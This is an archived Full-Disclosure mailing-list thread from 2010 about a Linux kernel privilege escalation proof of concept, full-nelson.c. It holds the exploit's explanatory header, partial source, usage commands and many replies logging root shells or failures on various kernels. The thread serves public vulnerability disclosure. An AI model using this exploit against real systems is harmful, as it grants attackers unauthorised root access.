 [+] Resolved econet_ops to 0xa0239600
 [+] Resolved commit_creds to 0x8108bd90
 [+] Resolved prepare_kernel_cred to 0x8108c170
[*] Calculating target...
[*] Failed to set Econet address.
[*] Triggering payload...
[*] Got root!
# id
uid=0(root) gid=0(root)
# 


:)



-Original Message-
From: Cal Leeming [Simplicity Media Ltd]

Reply-to: cal.leem...@simplicitymedialtd.co.uk
To: Dan Rosenberg 
Cc: full-disclosure@lists.grok.org.uk, bugt...@securityfocus.com
Subject: Re: [Full-disclosure] Linux kernel exploit
Date: Tue, 07 Dec 2010 21:06:44 +


Anyone tested this in sandbox yet?

On 07/12/2010 20:25, Dan Rosenberg wrote:
> Hi all,
>
> I've included here a proof-of-concept local privilege escalation exploit
> for Linux.  Please read the header for an explanation of what's going
> on.  Without further ado, I present full-nelson.c:
>
> Happy hacking,
> Dan
>
>
> --snip--
>
> /*
>   * Linux Kernel<= 2.6.37 local privilege escalation
>   * by Dan Rosenberg
>   * @djrbliss on twitter
>   *
>   * Usage:
>   * gcc full-nelson.c -o full-nelson
>   * ./full-nelson
>   *
>   * This exploit leverages three vulnerabilities to get root, all of which 
> were
>   * discovered by Nelson Elhage:
>   *
>   * CVE-2010-4258
>   * -
>   * This is the interesting one, and the reason I wrote this exploit.  If a
>   * thread is created via clone(2) using the CLONE_CHILD_CLEARTID flag, a NULL
>   * word will be written to a user-specified pointer when that thread exits.
>   * This write is done using put_user(), which ensures the provided 
> destination
>   * resides in valid userspace by invoking access_ok().  However, Nelson
>   * discovered that when the kernel performs an address limit override via
>   * set_fs(KERNEL_DS) and the thread subsequently OOPSes (via BUG, page fault,
>   * etc.), this override is not reverted before calling put_user() in the exit
>   * path, allowing a user to write a NULL word to an arbitrary kernel address.
>   * Note that this issue requires an additional vulnerability to trigger.
>   *
>   * CVE-2010-3849
>   * -
>   * This is a NULL pointer dereference in the Econet protocol.  By itself, 
> it's
>   * fairly benign as a local denial-of-service.  It's a perfect candidate to
>   * trigger the above issue, since it's reachable via sock_no_sendpage(), 
> which
>   * subsequently calls sendmsg under KERNEL_DS.
>   *
>   * CVE-2010-3850
>   * -
>   * I wouldn't be able to reach the NULL pointer dereference and trigger the
>   * OOPS if users weren't able to assign Econet addresses to arbitrary
>   * interfaces due to a missing capabilities check.
>   *
>   * In the interest of public safety, this exploit was specifically designed 
> to
>   * be limited:
>   *
>   *  * The particular symbols I resolve are not exported on Slackware or 
> Debian
>   *  * Red Hat does not support Econet by default
>   *  * CVE-2010-3849 and CVE-2010-3850 have both been patched by Ubuntu and
>   *Debian
>   *
>   * However, the important issue, CVE-2010-4258, affects everyone, and it 
> would
>   * be trivial to find an unpatched DoS under KERNEL_DS and write a slightly
>   * more sophisticated version of this that doesn't have the roadblocks I put 
> in
>   * to prevent abuse by script kiddies.
>   *
>   * Tested on unpatched Ubuntu 10.04 kernels, both x86 and x86-64.
>   *
>   * NOTE: the exploit process will deadlock and stay in a zombie state after 
> you
>   * exit your root shell because the Econet thread OOPSes while holding the
>   * Econet mutex.  It wouldn't be too hard to fix this up, but I didn't 
> bother.
>   *
>   * Greets to spender, taviso, stealth, pipacs, jono, kees, and bla
>   */
>
> #include
> #include
> #include
> #include
> #include
> #include
> #include
> #include
> #include
> #include
> #include
> #include
>
> /* How many bytes should we clear in our
>   * function pointer to put it into userspace? */
> #ifdef __x86_64__
> #define SHIFT 24
> #define OFFSET 3
> #else
> #define SHIFT 8
> #define OFFSET 1
> #endif
>
> /* thanks spender... */
> unsigned long get_kernel_sym(char *name)
> {
>   FILE *f;
>   unsigned long addr;
>   char dummy;
>   char sname[512];
>   struct utsname ver;
>   int ret;
>   int rep = 0;
>   int oldstyle = 0;
>
>   f = f

Re: [Full-disclosure] Linux kernel exploit

2010-12-08 Thread Benji

working here aswell

ownst...@local[~]$ uname -a
FreeBSD local 8.1-RELEASE-p1 FreeBSD 8.1-RELEASE-p1 #4: Thu Sep 23 08:30:18
UTC 2010 r...@benjir0x:/*usr*/*obj*/*usr*/*src*/*sys*/GENERIC amd64
ownst...@local[~]$ ./w00tw00t
[*] Resolving kernel addresses...
[+] Resolved econet_ioctl to 0xa0239510
[+] Resolved econet_ops to 0xa0239600
[+] Resolved commit_creds to 0x8108bd90
[+] Resolved prepare_kernel_cred to 0x8108c170
[*] Calculating target...

[*] Failed to set Econet address.
[*] Triggering payload...
[*] Got root!
# id
uid=0(root) gid=0(root)
#

On Wed, Dec 8, 2010 at 7:15 PM, leandro_lista
wrote:

>  Works in kernel 2.6.32-24
>
>
>
> Linux indzin-desktop 2.6.32-24-generic #41-Ubuntu SMP Thu Aug 19 01:38:40
> UTC 2010 x86_64 GNU/Linux
>
> ind...@indzin-desktop:~$ ./nels
> [*] Resolving kernel addresses...
> [+] Resolved econet_ioctl to 0xa0239510
> [+] Resolved econet_ops to 0xa0239600
> [+] Resolved commit_creds to 0x8108bd90
> [+] Resolved prepare_kernel_cred to 0x8108c170
> [*] Calculating target...
>
> [*] Failed to set Econet address.
> [*] Triggering payload...
> [*] Got root!
> # id
> uid=0(root) gid=0(root)
> #
>
>
> :)
>
>
>
>
> -Original Message-
> *From*: Cal Leeming [Simplicity Media Ltd] <
> cal.leem...@simplicitymedialtd.co.uk<%22cal%20leeming%20%5bsimplicity%20media%20ltd%5d%22%20%3ccal.leem...@simplicitymedialtd.co.uk%3e>
> >
> *Reply-to*: cal.leem...@simplicitymedialtd.co.uk
> *To*: Dan Rosenberg 
> 
> >
> *Cc*: full-disclosure@lists.grok.org.uk, bugt...@securityfocus.com
> *Subject*: Re: [Full-disclosure] Linux kernel exploit
> *Date*: Tue, 07 Dec 2010 21:06:44 +
>
> Anyone tested this in sandbox yet?
>
> On 07/12/2010 20:25, Dan Rosenberg wrote:
> > Hi all,
> >
> > I've included here a proof-of-concept local privilege escalation exploit
> > for Linux.  Please read the header for an explanation of what's going
> > on.  Without further ado, I present full-nelson.c:
> >
> > Happy hacking,
> > Dan
> >
> >
> > --snip--
> >
> > /*
> >   * Linux Kernel<= 2.6.37 local privilege escalation
> >   * by Dan Rosenberg
> >   * @djrbliss on twitter
> >   *
> >   * Usage:
> >   * gcc full-nelson.c -o full-nelson
> >   * ./full-nelson
> >   *
> >   * This exploit leverages three vulnerabilities to get root, all of which 
> > were
> >   * discovered by Nelson Elhage:
> >   *
> >   * CVE-2010-4258
> >   * -
> >   * This is the interesting one, and the reason I wrote this exploit.  If a
> >   * thread is created via clone(2) using the CLONE_CHILD_CLEARTID flag, a 
> > NULL
> >   * word will be written to a user-specified pointer when that thread exits.
> >   * This write is done using put_user(), which ensures the provided 
> > destination
> >   * resides in valid userspace by invoking access_ok().  However, Nelson
> >   * discovered that when the kernel performs an address limit override via
> >   * set_fs(KERNEL_DS) and the thread subsequently OOPSes (via BUG, page 
> > fault,
> >   * etc.), this override is not reverted before calling put_user() in the 
> > exit
> >   * path, allowing a user to write a NULL word to an arbitrary kernel 
> > address.
> >   * Note that this issue requires an additional vulnerability to trigger.
> >   *
> >   * CVE-2010-3849
> >   * -
> >   * This is a NULL pointer dereference in the Econet protocol.  By itself, 
> > it's
> >   * fairly benign as a local denial-of-service.  It's a perfect candidate to
> >   * trigger the above issue, since it's reachable via sock_no_sendpage(), 
> > which
> >   * subsequently calls sendmsg under KERNEL_DS.
> >   *
> >   * CVE-2010-3850
> >   * -
> >   * I wouldn't be able to reach the NULL pointer dereference and trigger the
> >   * OOPS if users weren't able to assign Econet addresses to arbitrary
> >   * interfaces due to a missing capabilities check.
> >   *
> >   * In the interest of public safety, this exploit was specifically 
> > designed to
> >   * be limited:
> >   *
> >   *  * The particular symbols I resolve are not exported on Slackware or 
> > Debian
> >   *  * Red Hat does not support Econet by default
> >   *  * CVE-2010-3849 and CVE-2010-3850 have both been patched by Ubuntu and
> >   *Debian
> >   *
> >   * However, the important issue, CVE-2010-4258, affects everyone, and it 
> > would
> >   * be trivial to f

Re: [Full-disclosure] Linux kernel exploit

2010-12-08 Thread David Flores

:~$ gcc nel.c
:~$ ./a.out
[*] Resolving kernel addresses...
 [+] Resolved econet_ioctl to 0xf9c47280
 [+] Resolved econet_ops to 0xf9c47360
 [+] Resolved commit_creds to 0xc01625a0
 [+] Resolved prepare_kernel_cred to 0xc01627a0
[*] Calculating target...
[*] Triggering payload...
[*] Got root!
# whoami
root
# id
uid=0(root) gid=0(root)
# uname -a
Linux sistemas 2.6.31-22-generic #65-Ubuntu SMP Thu Sep 16 15:48:58 UTC 2010
i686 GNU/Linux
#

On Wed, Dec 8, 2010 at 14:56, Benji  wrote:

> working here aswell
>
> ownst...@local[~]$ uname -a
> FreeBSD local 8.1-RELEASE-p1 FreeBSD 8.1-RELEASE-p1 #4: Thu Sep 23 08:30:18
> UTC 2010 r...@benjir0x:/*usr*/*obj*/*usr*/*src*/*sys*/GENERIC amd64
> ownst...@local[~]$ ./w00tw00t
>
> [*] Resolving kernel addresses...
> [+] Resolved econet_ioctl to 0xa0239510
> [+] Resolved econet_ops to 0xa0239600
> [+] Resolved commit_creds to 0x8108bd90
> [+] Resolved prepare_kernel_cred to 0x8108c170
> [*] Calculating target...
>
> [*] Failed to set Econet address.
> [*] Triggering payload...
> [*] Got root!
> # id
> uid=0(root) gid=0(root)
> #
>
> On Wed, Dec 8, 2010 at 7:15 PM, leandro_lista <
> leandro_li...@portari.com.br> wrote:
>
>>  Works in kernel 2.6.32-24
>>
>>
>>
>> Linux indzin-desktop 2.6.32-24-generic #41-Ubuntu SMP Thu Aug 19 01:38:40
>> UTC 2010 x86_64 GNU/Linux
>>
>> ind...@indzin-desktop:~$ ./nels
>> [*] Resolving kernel addresses...
>> [+] Resolved econet_ioctl to 0xa0239510
>> [+] Resolved econet_ops to 0xa0239600
>> [+] Resolved commit_creds to 0x8108bd90
>> [+] Resolved prepare_kernel_cred to 0x8108c170
>> [*] Calculating target...
>>
>> [*] Failed to set Econet address.
>> [*] Triggering payload...
>> [*] Got root!
>> # id
>> uid=0(root) gid=0(root)
>> #
>>
>>
>> :)
>>
>>
>>
>>
>> -Original Message-
>> *From*: Cal Leeming [Simplicity Media Ltd] <
>> cal.leem...@simplicitymedialtd.co.uk<%22cal%20leeming%20%5bsimplicity%20media%20ltd%5d%22%20%3ccal.leem...@simplicitymedialtd.co.uk%3e>
>> >
>> *Reply-to*: cal.leem...@simplicitymedialtd.co.uk
>> *To*: Dan Rosenberg 
>> 
>> >
>> *Cc*: full-disclosure@lists.grok.org.uk, bugt...@securityfocus.com
>> *Subject*: Re: [Full-disclosure] Linux kernel exploit
>> *Date*: Tue, 07 Dec 2010 21:06:44 +
>>
>> Anyone tested this in sandbox yet?
>>
>> On 07/12/2010 20:25, Dan Rosenberg wrote:
>> > Hi all,
>> >
>> > I've included here a proof-of-concept local privilege escalation exploit
>> > for Linux.  Please read the header for an explanation of what's going
>> > on.  Without further ado, I present full-nelson.c:
>> >
>> > Happy hacking,
>> > Dan
>> >
>> >
>> > --snip--
>> >
>> > /*
>> >   * Linux Kernel<= 2.6.37 local privilege escalation
>> >   * by Dan Rosenberg
>> >   * @djrbliss on twitter
>> >   *
>> >   * Usage:
>> >   * gcc full-nelson.c -o full-nelson
>> >   * ./full-nelson
>> >   *
>> >   * This exploit leverages three vulnerabilities to get root, all of which 
>> > were
>> >   * discovered by Nelson Elhage:
>> >   *
>> >   * CVE-2010-4258
>> >   * -
>> >   * This is the interesting one, and the reason I wrote this exploit.  If a
>> >   * thread is created via clone(2) using the CLONE_CHILD_CLEARTID flag, a 
>> > NULL
>> >   * word will be written to a user-specified pointer when that thread 
>> > exits.
>> >   * This write is done using put_user(), which ensures the provided 
>> > destination
>> >   * resides in valid userspace by invoking access_ok().  However, Nelson
>> >   * discovered that when the kernel performs an address limit override via
>> >   * set_fs(KERNEL_DS) and the thread subsequently OOPSes (via BUG, page 
>> > fault,
>> >   * etc.), this override is not reverted before calling put_user() in the 
>> > exit
>> >   * path, allowing a user to write a NULL word to an arbitrary kernel 
>> > address.
>> >   * Note that this issue requires an additional vulnerability to trigger.
>> >   *
>> >   * CVE-2010-3849
>> >   * -
>> >   * This is a NULL pointer dereference in the Econet protocol.  By itself, 
>> > it's
>> >   * fairly benign as a local denial-of-service.  It's a perfect candidate 
>> > to
&g

Re: [Full-disclosure] Linux kernel exploit

2010-12-08 Thread Rem7ter

Failed on Ubuntu 10.10
"
uname -a;
Linux admin-desktop 2.6.35-23-generic #41-Ubuntu SMP Wed Nov 24 10:18:49 UTC
2010 i686 GNU/Linux

[*] Resolving kernel addresses...
[+] Resolved econet_ioctl to 0xe0858340
[+] Resolved econet_ops to 0xe0858440
[+] Resolved commit_creds to 0xc016c8d0
[+] Resolved prepare_kernel_cred to 0xc016cd20
[*] Calculating target...
[*] Failed to set Econet address.
[*] Triggering payload...
[*] Exploit failed to get root.

"

2010/12/8 David Flores 

>
> :~$ gcc nel.c
> :~$ ./a.out
> [*] Resolving kernel addresses...
>  [+] Resolved econet_ioctl to 0xf9c47280
>  [+] Resolved econet_ops to 0xf9c47360
>  [+] Resolved commit_creds to 0xc01625a0
>  [+] Resolved prepare_kernel_cred to 0xc01627a0
> [*] Calculating target...
> [*] Triggering payload...
> [*] Got root!
> # whoami
>
> root
> # id
> uid=0(root) gid=0(root)
> # uname -a
> Linux sistemas 2.6.31-22-generic #65-Ubuntu SMP Thu Sep 16 15:48:58 UTC
> 2010 i686 GNU/Linux
> #
>
> On Wed, Dec 8, 2010 at 14:56, Benji  wrote:
>
>> working here aswell
>>
>> ownst...@local[~]$ uname -a
>> FreeBSD local 8.1-RELEASE-p1 FreeBSD 8.1-RELEASE-p1 #4: Thu Sep 23
>> 08:30:18 UTC 2010 r...@benjir0x:/*usr*/*obj*/*usr*/*src*/*sys*/GENERIC
>> amd64
>> ownst...@local[~]$ ./w00tw00t
>>
>> [*] Resolving kernel addresses...
>> [+] Resolved econet_ioctl to 0xa0239510
>> [+] Resolved econet_ops to 0xa0239600
>> [+] Resolved commit_creds to 0x8108bd90
>> [+] Resolved prepare_kernel_cred to 0x8108c170
>> [*] Calculating target...
>>
>> [*] Failed to set Econet address.
>> [*] Triggering payload...
>> [*] Got root!
>> # id
>> uid=0(root) gid=0(root)
>> #
>>
>> On Wed, Dec 8, 2010 at 7:15 PM, leandro_lista <
>> leandro_li...@portari.com.br> wrote:
>>
>>>  Works in kernel 2.6.32-24
>>>
>>>
>>>
>>> Linux indzin-desktop 2.6.32-24-generic #41-Ubuntu SMP Thu Aug 19 01:38:40
>>> UTC 2010 x86_64 GNU/Linux
>>>
>>> ind...@indzin-desktop:~$ ./nels
>>> [*] Resolving kernel addresses...
>>> [+] Resolved econet_ioctl to 0xa0239510
>>> [+] Resolved econet_ops to 0xa0239600
>>> [+] Resolved commit_creds to 0x8108bd90
>>> [+] Resolved prepare_kernel_cred to 0x8108c170
>>> [*] Calculating target...
>>>
>>> [*] Failed to set Econet address.
>>> [*] Triggering payload...
>>> [*] Got root!
>>> # id
>>> uid=0(root) gid=0(root)
>>> #
>>>
>>>
>>> :)
>>>
>>>
>>>
>>>
>>> -Original Message-
>>> *From*: Cal Leeming [Simplicity Media Ltd] <
>>> cal.leem...@simplicitymedialtd.co.uk<%22cal%20leeming%20%5bsimplicity%20media%20ltd%5d%22%20%3ccal.leem...@simplicitymedialtd.co.uk%3e>
>>> >
>>> *Reply-to*: cal.leem...@simplicitymedialtd.co.uk
>>> *To*: Dan Rosenberg 
>>> 
>>> >
>>> *Cc*: full-disclosure@lists.grok.org.uk, bugt...@securityfocus.com
>>> *Subject*: Re: [Full-disclosure] Linux kernel exploit
>>> *Date*: Tue, 07 Dec 2010 21:06:44 +
>>>
>>> Anyone tested this in sandbox yet?
>>>
>>> On 07/12/2010 20:25, Dan Rosenberg wrote:
>>> > Hi all,
>>> >
>>> > I've included here a proof-of-concept local privilege escalation exploit
>>> > for Linux.  Please read the header for an explanation of what's going
>>> > on.  Without further ado, I present full-nelson.c:
>>> >
>>> > Happy hacking,
>>> > Dan
>>> >
>>> >
>>> > --snip--
>>> >
>>> > /*
>>> >   * Linux Kernel<= 2.6.37 local privilege escalation
>>> >   * by Dan Rosenberg
>>> >   * @djrbliss on twitter
>>> >   *
>>> >   * Usage:
>>> >   * gcc full-nelson.c -o full-nelson
>>> >   * ./full-nelson
>>> >   *
>>> >   * This exploit leverages three vulnerabilities to get root, all of 
>>> > which were
>>> >   * discovered by Nelson Elhage:
>>> >   *
>>> >   * CVE-2010-4258
>>> >   * -
>>> >   * This is the interesting one, and the reason I wrote this exploit.  If 
>>> > a
>>> >   * thread is created via clone(2) using the CLONE_CHILD_CLEARTID flag, a 
>>> > NULL
>>> >   * word will be written to a user-specified pointer when that thread 
>>&

Re: [Full-disclosure] Linux kernel exploit

2010-12-08 Thread Ed Carp

On Tue, Dec 7, 2010 at 1:21 PM, Ryan Sears  wrote:

> Yep, just tested it in an Ubuntu 10.10 sandbox I have (running kernel 
> 2.6.35-22-generic). Works as expected.
>
> Great job Dan. You're full of win!

Except that he needs to clean up his code - no one uses go to anymore.

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Linux kernel exploit

2010-12-08 Thread nArEn ÁĹ0ПΞ Ŵ0ĹŦஇ

Worked on Ubuntu 10.10 .. awesome work :)


On Thu, Dec 9, 2010 at 11:15 AM, Ed Carp  wrote:

> On Tue, Dec 7, 2010 at 1:21 PM, Ryan Sears  wrote:
>
> > Yep, just tested it in an Ubuntu 10.10 sandbox I have (running kernel
> 2.6.35-22-generic). Works as expected.
> >
> > Great job Dan. You're full of win!
>
> Except that he needs to clean up his code - no one uses go to anymore.
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>



-- 
ܔܢܜܔNaReN(๏̯͡๏)
ιηƒσямαт!ση ~# αησтнєя ηαмє σƒ gσ∂ ~●•●•●๋•
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Linux kernel exploit

2010-12-09 Thread Vadim Grinco

$ ./nelson
[*] Failed to open file descriptors.
$ uname -r
2.6.35.6-48.fc14.x86_64
$ cat /etc/redhat-release
Fedora release 14 (Laughlin)

But I updated a couple of days ago.

-- 
Best regards,
Vadim

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Linux kernel exploit

2010-12-09 Thread Sherif Mousa

Hi Dan,

Tested on:

kernel 2.6.32 (Ubuntu 10.04) >> worked.
kernel 2.6.28 >> didn’t work. (Failed to open file descriptors)

Nice work, Dan.

Regards,
Sherif



On Tue, Dec 7, 2010 at 10:25 PM, Dan Rosenberg wrote:

> Hi all,
>
> I've included here a proof-of-concept local privilege escalation exploit
> for Linux.  Please read the header for an explanation of what's going
> on.  Without further ado, I present full-nelson.c:
>
> Happy hacking,
> Dan
>
>
> --snip--
>
> /*
>  * Linux Kernel <= 2.6.37 local privilege escalation
>  * by Dan Rosenberg
>  * @djrbliss on twitter
>  *
>  * Usage:
>  * gcc full-nelson.c -o full-nelson
>  * ./full-nelson
>  *
>  * This exploit leverages three vulnerabilities to get root, all of which
> were
>  * discovered by Nelson Elhage:
>  *
>  * CVE-2010-4258
>  * -
>  * This is the interesting one, and the reason I wrote this exploit.  If a
>  * thread is created via clone(2) using the CLONE_CHILD_CLEARTID flag, a
> NULL
>  * word will be written to a user-specified pointer when that thread exits.
>  * This write is done using put_user(), which ensures the provided
> destination
>  * resides in valid userspace by invoking access_ok().  However, Nelson
>  * discovered that when the kernel performs an address limit override via
>  * set_fs(KERNEL_DS) and the thread subsequently OOPSes (via BUG, page
> fault,
>  * etc.), this override is not reverted before calling put_user() in the
> exit
>  * path, allowing a user to write a NULL word to an arbitrary kernel
> address.
>  * Note that this issue requires an additional vulnerability to trigger.
>  *
>  * CVE-2010-3849
>  * -
>  * This is a NULL pointer dereference in the Econet protocol.  By itself,
> it's
>  * fairly benign as a local denial-of-service.  It's a perfect candidate to
>  * trigger the above issue, since it's reachable via sock_no_sendpage(),
> which
>  * subsequently calls sendmsg under KERNEL_DS.
>  *
>  * CVE-2010-3850
>  * -
>  * I wouldn't be able to reach the NULL pointer dereference and trigger the
>  * OOPS if users weren't able to assign Econet addresses to arbitrary
>  * interfaces due to a missing capabilities check.
>  *
>  * In the interest of public safety, this exploit was specifically designed
> to
>  * be limited:
>  *
>  *  * The particular symbols I resolve are not exported on Slackware or
> Debian
>  *  * Red Hat does not support Econet by default
>  *  * CVE-2010-3849 and CVE-2010-3850 have both been patched by Ubuntu and
>  *Debian
>  *
>  * However, the important issue, CVE-2010-4258, affects everyone, and it
> would
>  * be trivial to find an unpatched DoS under KERNEL_DS and write a slightly
>  * more sophisticated version of this that doesn't have the roadblocks I
> put in
>  * to prevent abuse by script kiddies.
>  *
>  * Tested on unpatched Ubuntu 10.04 kernels, both x86 and x86-64.
>  *
>  * NOTE: the exploit process will deadlock and stay in a zombie state after
> you
>  * exit your root shell because the Econet thread OOPSes while holding the
>  * Econet mutex.  It wouldn't be too hard to fix this up, but I didn't
> bother.
>  *
>  * Greets to spender, taviso, stealth, pipacs, jono, kees, and bla
>  */
>
> #include 
> #include 
> #include 
> #include 
> #include 
> #include 
> #include 
> #include 
> #include 
> #include 
> #include 
> #include 
>
> /* How many bytes should we clear in our
>  * function pointer to put it into userspace? */
> #ifdef __x86_64__
> #define SHIFT 24
> #define OFFSET 3
> #else
> #define SHIFT 8
> #define OFFSET 1
> #endif
>
> /* thanks spender... */
> unsigned long get_kernel_sym(char *name)
> {
>FILE *f;
>unsigned long addr;
>char dummy;
>char sname[512];
>struct utsname ver;
>int ret;
>int rep = 0;
>int oldstyle = 0;
>
>f = fopen("/proc/kallsyms", "r");
>if (f == NULL) {
>f = fopen("/proc/ksyms", "r");
>if (f == NULL)
>goto fallback;
>oldstyle = 1;
>}
>
> repeat:
>ret = 0;
>while(ret != EOF) {
>if (!oldstyle)
>ret = fscanf(f, "%p %c %s\n", (void **)&addr,
> &dummy, sname);
>else {
>ret = fscanf(f, "%p %s\n", (void **)&addr, sname);
>if (ret == 2) {
>char *p;
>if (strstr(sname, "_O/") || strstr(sname,
> "_S."))
>continue;
>p = strrchr(sname, '_');
>if (p > ((char *)sname + 5) && !strncmp(p -
> 3, "smp", 3)) {
>p = p - 4;
>while (p > (char *)sname && *(p - 1)
> == '_')
>p--;
>*p = '\0';
>

Re: [Full-disclosure] Linux kernel exploit

2010-12-09 Thread Jean Pierre Dentone

a few test

[...@yangtao ~]$ ./extest
./extest: error while loading shared libraries: requires glibc 2.5 or 
later dynamic linker
[...@yangtao ~]$ uname -r
2.6.9-89.0.25.ELsmp
[...@yangtao ~]$ cat /etc/redhat-release
CentOS release 4.8 (Final)

==

[...@kernel ~]$ ./extest
[*] Failed to open file descriptors.
[...@kernel ~]$ uname -r
2.6.35.4
[...@kernel ~]$ cat /etc/redhat-release
CentOS release 5.2 (Final)

==

[...@kernel64 ~]$ ./extest
[*] Failed to open file descriptors.
[...@kernel64 ~]$ uname -r
2.6.33.1
[...@kernel64 ~]$ cat /etc/redhat-release
CentOS release 5.5 (Final)

On 12/8/2010 4:42 PM, Vadim Grinco wrote:
> $ ./nelson
> [*] Failed to open file descriptors.
> $ uname -r
> 2.6.35.6-48.fc14.x86_64
> $ cat /etc/redhat-release
> Fedora release 14 (Laughlin)
>
> But I updated a couple of days ago.
>

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Linux kernel exploit

2010-12-10 Thread Urlan

More one test:

t...@test:~/Downloads$ ./testing
[*] Resolving kernel addresses...
 [+] Resolved econet_ioctl to 0xa0026610
 [+] Resolved econet_ops to 0xa0026720
 [+] Resolved commit_creds to 0x810863c0
 [+] Resolved prepare_kernel_cred to 0x81086890
[*] Calculating target...
[*] Triggering payload...
[*] Exploit failed to get root.
t...@test:~/Downloads$ uname -a
Linux test 2.6.35-23-generic #41-Ubuntu SMP Wed Nov 24 11:55:36 UTC 2010
x86_64 GNU/Linux

Urlan

2010/12/9 Jean Pierre Dentone 

> a few test
>
> [...@yangtao ~]$ ./extest
> ./extest: error while loading shared libraries: requires glibc 2.5 or
> later dynamic linker
> [...@yangtao ~]$ uname -r
> 2.6.9-89.0.25.ELsmp
> [...@yangtao ~]$ cat /etc/redhat-release
> CentOS release 4.8 (Final)
>
> ==
>
> [...@kernel ~]$ ./extest
> [*] Failed to open file descriptors.
> [...@kernel ~]$ uname -r
> 2.6.35.4
> [...@kernel ~]$ cat /etc/redhat-release
> CentOS release 5.2 (Final)
>
> ==
>
> [...@kernel64 ~]$ ./extest
> [*] Failed to open file descriptors.
> [...@kernel64 ~]$ uname -r
> 2.6.33.1
> [...@kernel64 ~]$ cat /etc/redhat-release
> CentOS release 5.5 (Final)
>
> On 12/8/2010 4:42 PM, Vadim Grinco wrote:
> > $ ./nelson
> > [*] Failed to open file descriptors.
> > $ uname -r
> > 2.6.35.6-48.fc14.x86_64
> > $ cat /etc/redhat-release
> > Fedora release 14 (Laughlin)
> >
> > But I updated a couple of days ago.
> >
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>



-- 
_
Urlan Salgado de Barros
MSc. Student in Applied Informatics
Member of NR2 Group
Federal University of Paraná - Curitiba - Brazil
URL: 
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Linux kernel exploit

2010-12-13 Thread Francisco J

h...@darkstar:~$ cat /etc/slackware-version
Slackware 13.1.0
h...@darkstar:~$ uname -a
Linux darkstar 2.6.33.4-smp #2 SMP Wed May 12 22:47:36 CDT 2010 i686 
Intel(R) Core(TM)2 CPU T5600  @ 1.83GHz GenuineIntel GNU/Linux
h...@darkstar:~$ cc full-nelson.c -o full-nelson
h...@darkstar:~$ ./full-nelson
[*] Failed to open file descriptors.


On 12/7/2010 6:25 PM, Dan Rosenberg wrote:
> Hi all,
>
> I've included here a proof-of-concept local privilege escalation exploit
> for Linux.  Please read the header for an explanation of what's going
> on.  Without further ado, I present full-nelson.c:
>
> Happy hacking,
> Dan
>
>
> --snip--
>
> /*
>   * Linux Kernel<= 2.6.37 local privilege escalation
>   * by Dan Rosenberg
>   * @djrbliss on twitter
>   *
>   * Usage:
>   * gcc full-nelson.c -o full-nelson
>   * ./full-nelson
>   *
>   * This exploit leverages three vulnerabilities to get root, all of which 
> were
>   * discovered by Nelson Elhage:
>   *
>   * CVE-2010-4258
>   * -
>   * This is the interesting one, and the reason I wrote this exploit.  If a
>   * thread is created via clone(2) using the CLONE_CHILD_CLEARTID flag, a NULL
>   * word will be written to a user-specified pointer when that thread exits.
>   * This write is done using put_user(), which ensures the provided 
> destination
>   * resides in valid userspace by invoking access_ok().  However, Nelson
>   * discovered that when the kernel performs an address limit override via
>   * set_fs(KERNEL_DS) and the thread subsequently OOPSes (via BUG, page fault,
>   * etc.), this override is not reverted before calling put_user() in the exit
>   * path, allowing a user to write a NULL word to an arbitrary kernel address.
>   * Note that this issue requires an additional vulnerability to trigger.
>   *
>   * CVE-2010-3849
>   * -
>   * This is a NULL pointer dereference in the Econet protocol.  By itself, 
> it's
>   * fairly benign as a local denial-of-service.  It's a perfect candidate to
>   * trigger the above issue, since it's reachable via sock_no_sendpage(), 
> which
>   * subsequently calls sendmsg under KERNEL_DS.
>   *
>   * CVE-2010-3850
>   * -
>   * I wouldn't be able to reach the NULL pointer dereference and trigger the
>   * OOPS if users weren't able to assign Econet addresses to arbitrary
>   * interfaces due to a missing capabilities check.
>   *
>   * In the interest of public safety, this exploit was specifically designed 
> to
>   * be limited:
>   *
>   *  * The particular symbols I resolve are not exported on Slackware or 
> Debian
>   *  * Red Hat does not support Econet by default
>   *  * CVE-2010-3849 and CVE-2010-3850 have both been patched by Ubuntu and
>   *Debian
>   *
>   * However, the important issue, CVE-2010-4258, affects everyone, and it 
> would
>   * be trivial to find an unpatched DoS under KERNEL_DS and write a slightly
>   * more sophisticated version of this that doesn't have the roadblocks I put 
> in
>   * to prevent abuse by script kiddies.
>   *
>   * Tested on unpatched Ubuntu 10.04 kernels, both x86 and x86-64.
>   *
>   * NOTE: the exploit process will deadlock and stay in a zombie state after 
> you
>   * exit your root shell because the Econet thread OOPSes while holding the
>   * Econet mutex.  It wouldn't be too hard to fix this up, but I didn't 
> bother.
>   *
>   * Greets to spender, taviso, stealth, pipacs, jono, kees, and bla
>   */
>
> #include
> #include
> #include
> #include
> #include
> #include
> #include
> #include
> #include
> #include
> #include
> #include
>
> /* How many bytes should we clear in our
>   * function pointer to put it into userspace? */
> #ifdef __x86_64__
> #define SHIFT 24
> #define OFFSET 3
> #else
> #define SHIFT 8
> #define OFFSET 1
> #endif
>
> /* thanks spender... */
> unsigned long get_kernel_sym(char *name)
> {
>   FILE *f;
>   unsigned long addr;
>   char dummy;
>   char sname[512];
>   struct utsname ver;
>   int ret;
>   int rep = 0;
>   int oldstyle = 0;
>
>   f = fopen("/proc/kallsyms", "r");
>   if (f == NULL) {
>   f = fopen("/proc/ksyms", "r");
>   if (f == NULL)
>   goto fallback;
>   oldstyle = 1;
>   }
>
> repeat:
>   ret = 0;
>   while(ret != EOF) {
>   if (!oldstyle)
